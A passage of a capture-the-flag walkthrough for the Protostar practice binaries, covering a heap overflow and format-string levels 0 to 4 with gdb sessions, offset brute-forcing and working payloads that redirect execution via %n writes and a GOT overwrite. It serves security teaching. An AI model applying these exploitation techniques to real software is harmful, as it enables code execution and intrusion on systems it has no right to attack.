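    """Return (argv[1], argv[2]) for a given esp value seen inside strcpy()."""
    ret_slot = esp_at_crash + 3 * 4  # two zero words, saved ebp, then the return address
    arg1 = b"A" * 20 + struct.pack("<I", ret_slot)  # overwrites i2->name
    arg2 = struct.pack("<I", WINNER)                # written to the return address slot
    return arg1, arg2

gdb_args = build_args(0xBFFFF640)      # esp seen inside gdb
console_args = build_args(0xBFFFFB60)  # esp after unsetting LINES and COLUMNS

print(gdb_args[0][20:].hex())      # 4cf6ffbf
print(console_args[0][20:].hex())  # 6cfbffbf
```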
Exploit Exercises — Protostar Heap 0
This level is a lot like classical stack overflows.
Let’s crash the app first:
(gdb) r `python -c "print 'A'*1000"`
Starting program: /opt/protostar/bin/heap0 `python -c "print 'A'*1000"`
data is at 0x804a008, fp is at 0x804a050
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Now let’s find the offset using the pattern tools from Metasploit. Generate a pattern using this command:
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
Then run the program with the pattern as input:
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
Starting program: /opt/protostar/bin/heap0 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
data is at 0x804a008, fp is at 0x804a050
Program received signal SIGSEGV, Segmentation fault.
0x41346341 in ?? ()
Then search for 0x41346341 in the pattern:
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x41346341
[*] Exact match at offset 72
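The output above means that we need to write 72 bytes before reaching the value that ends up in eip. This matches the addresses the program prints: fp is at 0x804a050 and data is at 0x804a008, which are 0x48 = 72 bytes apart.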
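If Metasploit is not at hand, the same lookup can be sketched in a few lines of Python 3. This is not the Metasploit implementation; pattern_create and pattern_offset here are my own functions that reproduce the Aa0Aa1Aa2... scheme visible in the pattern above.

```python
import string
import struct

def pattern_create(length):
    """Build a cyclic pattern of Upper/lower/digit triples: Aa0Aa1...Aa9Ab0..."""
    triples = (
        upper + lower + digit
        for upper in string.ascii_uppercase
        for lower in string.ascii_lowercase
        for digit in string.digits
    )
    pattern = ""
    for triple in triples:
        if len(pattern) >= length:
            break
        pattern += triple
    return pattern[:length]

def pattern_offset(value, length=200):
    """Find where a 32-bit value read from eip occurs in the pattern."""
    needle = struct.pack("<I", value).decode("ascii")  # little-endian byte order
    return pattern_create(length).find(needle)

print(pattern_offset(0x41346341))  # 72
```

The value 0x41346341 is the string Ac4A once the little-endian byte order is undone, and that substring starts 72 characters into the pattern.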
Now we need to find the address of winner():
$ readelf -s heap0
...
55: 08048464 20 FUNC GLOBAL DEFAULT 14 winner
Now let’s use this address in the exploit:
$ ./heap0 `python -c "print 'A'*72 + '\x64\x84\x04\x08'"`
data is at 0x804a008, fp is at 0x804a050
level passed
This is a protostar walkthrough describing format string exploitation.
This article is the only thing you need to complete these levels.
$ ./format0 %64d`python -c 'print "\xef\xbe\xad\xde"'`
you have hit the target correctly :)
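When we use %64d, sprintf takes one integer from the stack and prints it padded to a width of 64 characters, which fills buffer completely. The 0xdeadbeef bytes that follow are copied past the end of buffer, causing the overflow.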
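The effect of the width specifier can be seen with Python’s printf-style formatting, which pads %64d the same way. A small sketch; the value 1 is an arbitrary stand-in for whatever integer sprintf happens to read from the stack.

```python
import struct

padded = "%64d" % 1  # one integer, right-aligned in a field of 64 characters
payload = padded.encode("ascii") + struct.pack("<I", 0xDEADBEEF)

print(len(padded))         # 64: exactly the size of the buffer
print(payload[64:].hex())  # efbeadde: the bytes that land past the buffer
```

This is why a 9-character argument is enough to produce 68 bytes of output.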
Read this first to understand how different variables are stored. Then we look for target:
$ objdump -t format1 | grep target
08049638 g O .bss 00000004 target
We see that the variable we need is in the uninitialized data segment, called .bss, and has the address 0x08049638.
Then I printed 146 words from the stack and tried to find where our buffer is stored:
$ ./format1 ABCD`python -c 'print "%x."*146'`
ABCD804960c.bffff508.8048469.b7fd8304.b7fd7ff4.bffff508.8048435.bffff708.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff588.b7eadc76.2.bffff5b4.bffff5c0.b7fe1848.bffff570.ffffffff.b7ffeff4.804824d.1.bffff570.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff588.a003ccb4.8a519aa4.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff5b4.8048450.8048440.b7ff1040.bffff5ac.b7fff8f8.2.bffff6fe.bffff708.0.bffff8c3.bffff8d8.bffff8ef.bffff907.bffff915.bffff929.bffff94c.bffff963.bffff976.bffff980.bffffe70.bffffe89.bffffec7.bffffedb.bffffef9.bfffff10.bfffff21.bfffff3c.bfffff44.bfffff54.bfffff61.bfffff97.bfffffac.bfffffc0.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.78bfbbf.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff6db.1f.bffffff2.f.bffff6eb.0.0.0.0.0.50000000.f6e2fdf8.67e5aff4.14e8ba4e.6901a7c9.363836.0.0.0.2f2e0000.6d726f66.317461.44434241.252e7825.78252e78.2e78252e.252e7825.
Can you see the 0x44434241 value near the end? You can also use some brute force:
$ for i in {1..1000}; do echo -n "$i ";./format1 "ABCD%$i\$x" | grep 44434241; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
141
142 ABCD44434241
The %N$x syntax (for example, %4$x) is what is called “direct access”.
You can see ABCD above (don’t forget we are on a little-endian machine). Now we know the offset and we can try to directly access this variable:
./format1 ABCD`python -c 'print "%142$x"'`
ABCD44434241u
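The byte order is quick to double-check with Python’s struct module. This sketch only restates values already shown in this walkthrough.

```python
import struct

# The word printed by %x is 0x44434241; stored little-endian it is "ABCD".
print(struct.pack("<I", 0x44434241))  # b'ABCD'

# The address of target, packed the same way, gives the bytes to put in the input.
target_bytes = struct.pack("<I", 0x08049638)
print(target_bytes)                   # b'8\x96\x04\x08'
```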
Now we know the offset on the stack in printf, and we can rewrite the value using %n. Read more about using %n here. In a nutshell, for %n you must supply the address of an int variable, and the number of bytes written so far will be stored there.
So if you use something like <addr>%142$n, it will take addr from the stack and write the number of bytes written so far there.
We know the address is 0x08049638, which in little-endian format is \x38\x96\x04\x08. Now we can simply replace ABCD with the address:
$ ./format1 `python -c 'print "\x38\x96\x04\x08"+"%142$n"'`
8�you have modified the target :)
Now we are supposed to overwrite the variable with a particular value, 64.
Let’s do a bit of brute forcing to find the offset:
$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format2 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141target is 0 :(
Now we need to find the address of the target variable:
$ objdump -t format2 | grep target
080496e4 g O .bss 00000004 target
Let’s try to overwrite the variable with an arbitrary value:
$ python -c "print '\xe4\x96\x04\x08'+'%4\$n'" | ./format2
��
target is 4 :(
We wrote 4 bytes, and target reports exactly that. If we want to write a larger value, we just need to increase the number of bytes written. In this case the program outputs 64 bytes before %4$n, and %4$n then stores the number of bytes written so far:
$ python -c "print '\xe4\x96\x04\x08'+'A'*60+'%4\$n'" | ./format2
��AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
you have modified the target :)
We start this challenge with bruteforcing to find the offset:
$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format3 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
11
12 AAAAAA41414141target is 00000000 :(
Now we need to find the memory address of target:
$ objdump -t format3 | grep target
080496f4 g O .bss 00000004 target
So let’s try to rewrite target:
$ python -c "print '\xf4\x96\x04\x08'+'%12\$n'" | ./format3
��
target is 00000004 :(
Awesome! It says we wrote 4 bytes.
Then I tried to extend the string and look at the stack:
$ python -c "print 'AAAABBBBCCCCDDDDEEEEFFFFGGGG'+'%x.'*16" | ./format3
AAAABBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.41414141.42424242.43434343.44444444.45454545.
target is 00000000 :(
Now let’s directly access the 12th argument and then look at the values on the stack:
$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDDEEEEFFFFGGGG'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.45454545.46464646.47474747.24323125.2e78256e.
target is 0000001c :(
To be clearer, let’s draw a simple scheme of our stack:
junk <- 1st, 2nd, ... values
...
\xf4\x96\x04\x08 <- 12th value
BBBB <- 13th value
CCCC <- 14th value
DDDD <- 15th value
EEEE
FFFF
GGGG
...
<saved ebp>
<saved ret>
I understand that it could be confusing, because the numbers here have nothing to do with how the stack grows. They are just argument numbers. If it is confusing, try reading about direct access in this paper.
Now everything is clear: we need to replace BBBB, CCCC and DDDD with address + i so that each write targets a different byte, and add the padding needed to make each write store the right value.
Let’s try to overwrite the lowest byte first. It must be 0x44:
$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDD'+'%52u'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDD 0bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.75323525.24323125.2e78256e.252e7825.78252e78.2e78252e.
target is 00000044 :(
Then I tried to overwrite the second byte, at address + 1:
$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%13\$n'" | ./format3
����CCCCDDDD 0
target is 00004444 :(
Awesome, it works. I didn’t know that %n uses the running count of bytes printed so far, which only grows. So it’s easier to write small values first. We need to get 0x01025544, but after writing 0x55 we certainly cannot bring the count back down to 0x01 or 0x02. However, the low byte of each count is what lands at the addressed byte, so we can try to write 0x101, for example. We will write in this order: 0x44, 0x55, 0x101, 0x102 (or maybe 0x202).
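The padding for each write can be worked out mechanically. The Python 3 sketch below is a slight variation on the plan above: it writes the bytes in address order and relies on wrap-around modulo 256 instead of sorting the values. The function name plan_byte_writes and the minimum width of 10 (so that a 32-bit value printed with %u never exceeds the requested width) are assumptions of this sketch.

```python
def plan_byte_writes(value, already_printed, num_bytes=4, min_width=10):
    """Return (byte_offset, pad_width, running_count) per byte, lowest first."""
    plan = []
    count = already_printed
    for offset in range(num_bytes):
        wanted = (value >> (8 * offset)) & 0xFF   # byte that must land here
        pad = (wanted - count) % 256              # extra output needed
        if pad < min_width:
            pad += 256                            # keep %<pad>u width reliable
        count += pad
        plan.append((offset, pad, count))
    return plan

# 16 bytes are already printed before the first %u (addresses and fillers).
for offset, pad, count in plan_byte_writes(0x01025544, 16):
    print(offset, pad, hex(count))
```

For 0x01025544 this yields the widths 52, 17, 173 and 255, with running counts 0x44, 0x55, 0x102 and 0x201.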
0x55 belongs in the byte at address + 1, so we only need to increase the address by 1:
$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'" | ./format3
����CCCCDDDD 0 3221222592
target is 00005544 :(
Instead of writing 0x101 and 0x102 separately, we can try to write 0x102 as a two-byte value at address + 2:
$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08DDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'+'%173u'+'%14\$n'" | ./format3
������DDDD 0 3221222592 3086843892
you have modified the target :)
Wow, we modified the target :)
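To see why three writes are enough, it helps to replay them on a model of memory. This Python 3 sketch assumes each %n stores a 32-bit little-endian integer (as on this 32-bit x86 target); apply_n_writes is a made-up helper, and the addresses and counts are the ones from the command above.

```python
import struct

def apply_n_writes(memory, base, writes):
    """Apply 32-bit little-endian %n-style stores; writes = [(address, count), ...]."""
    for address, count in writes:
        start = address - base
        memory[start:start + 4] = struct.pack("<I", count & 0xFFFFFFFF)
    return memory

base = 0x080496f4
memory = bytearray(8)   # target (4 bytes) plus the 4 bytes that follow it
apply_n_writes(memory, base, [
    (0x080496f4, 0x44),    # %12$n after 68 bytes
    (0x080496f5, 0x55),    # %13$n after 85 bytes
    (0x080496f6, 0x102),   # %14$n after 258 bytes
])
target = struct.unpack_from("<I", memory, 0)[0]
print(hex(target))  # 0x1025544
```

Note that the last store also overwrites the two bytes after target with zeros, which this challenge happens to tolerate.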
Now we need to redirect the execution flow. To do so, we could just overwrite the return address.
As always we start with finding the offset:
$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format4 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141
Now let’s find the address of the hello() function:
$ objdump -t format4 | grep hello
080484b4 g F .text 0000001e hello
At this point I realized that we are not supposed to overwrite the return address; instead we need to change an entry in the relocation table.
Let’s look at the relocations:
$ objdump -TR format4
format4: file format elf32-i386
DYNAMIC SYMBOL TABLE:
00000000 w D *UND* 00000000 __gmon_start__
00000000 DF *UND* 00000000 GLIBC_2.0 fgets
00000000 DF *UND* 00000000 GLIBC_2.0 __libc_start_main
00000000 DF *UND* 00000000 GLIBC_2.0 _exit
00000000 DF *UND* 00000000 GLIBC_2.0 printf
00000000 DF *UND* 00000000 GLIBC_2.0 puts
00000000 DF *UND* 00000000 GLIBC_2.0 exit
080485ec g DO .rodata 00000004 Base _IO_stdin_used
08049730 g DO .bss 00000004 GLIBC_2.0 stdin
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
080496fc R_386_GLOB_DAT __gmon_start__
08049730 R_386_COPY stdin
0804970c R_386_JUMP_SLOT __gmon_start__
08049710 R_386_JUMP_SLOT fgets
08049714 R_386_JUMP_SLOT __libc_start_main
08049718 R_386_JUMP_SLOT _exit
0804971c R_386_JUMP_SLOT printf
08049720 R_386_JUMP_SLOT puts
08049724 R_386_JUMP_SLOT exit
You can also look at the relocation table with:
$ readelf -r format4
Relocation section '.rel.dyn' at offset 0x304 contains 2 entries:
Offset Info Type Sym.Value Sym. Name
080496fc 00000106 R_386_GLOB_DAT 00000000 __gmon_start__
08049730 00000905 R_386_COPY 08049730 stdin
Relocation section '.rel.plt' at offset 0x314 contains 7 entries:
Offset Info Type Sym.Value Sym. Name
0804970c 00000107 R_386_JUMP_SLOT 00000000 __gmon_start__
08049710 00000207 R_386_JUMP_SLOT 00000000 fgets
08049714 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main
08049718 00000407 R_386_JUMP_SLOT 00000000 _exit
0804971c 00000507 R_386_JUMP_SLOT 00000000 printf
08049720 00000607 R_386_JUMP_SLOT 00000000 puts
08049724 00000707 R_386_JUMP_SLOT 00000000 exit
Good articles about shared libraries and relocations:
I thought it would be a good idea to overwrite the relocation entry of exit() with the address of hello(). So we need to replace the value at address 0x08049724 with 0x080484b4.
Now let’s use a test exploit:
$ python -c "print '\x24\x97\x04\x08' + '%33968x' + '%4\$n'" > /tmp/exploit.txt
$ gdb format4
GNU gdb (GDB) 7.0.1-debian
Reading symbols from /opt/protostar/bin/format4...done.
(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/format4 < /tmp/exploit.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x000084b4 in ?? ()
Awesome. We overwrote the two low bytes and jumped to 0x000084b4. Let’s do the same with the other two bytes. Do not forget to correct the padding (subtract 4 from the first one, because we added another 4-byte address).
Now run the exploit:
$ python -c "print '\x24\x97\x04\x08\x26\x97\x04\x08' + '%33964x' + '%4\$n' + '%33616x' + '%5\$n'" | ./format4
...
code execution redirected! you win
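The two padding values can be derived rather than guessed. The Python 3 sketch below splits the address of hello() into 16-bit halves and computes how much output each %x must add; the helper name half_write_paddings is hypothetical, and the 8 bytes already printed are the two addresses at the start of the payload.

```python
def half_write_paddings(value, already_printed):
    """Return the %x widths for writing value as two 16-bit halves, low half first."""
    low = value & 0xFFFF            # 0x84b4, stored at the slot address
    high = (value >> 16) & 0xFFFF   # 0x0804, stored at the slot address + 2
    first = (low - already_printed) % 0x10000
    second = (high - low) % 0x10000  # wraps around because high < low
    return first, second

print(half_write_paddings(0x080484b4, 8))  # (33964, 33616)
```

After the second padding the running count is 0x10804, so the low 16 bits (0x0804) land in the upper half of the exit() slot, and since plain %n stores 4 bytes the extra 0x0001 spills into the two bytes after it.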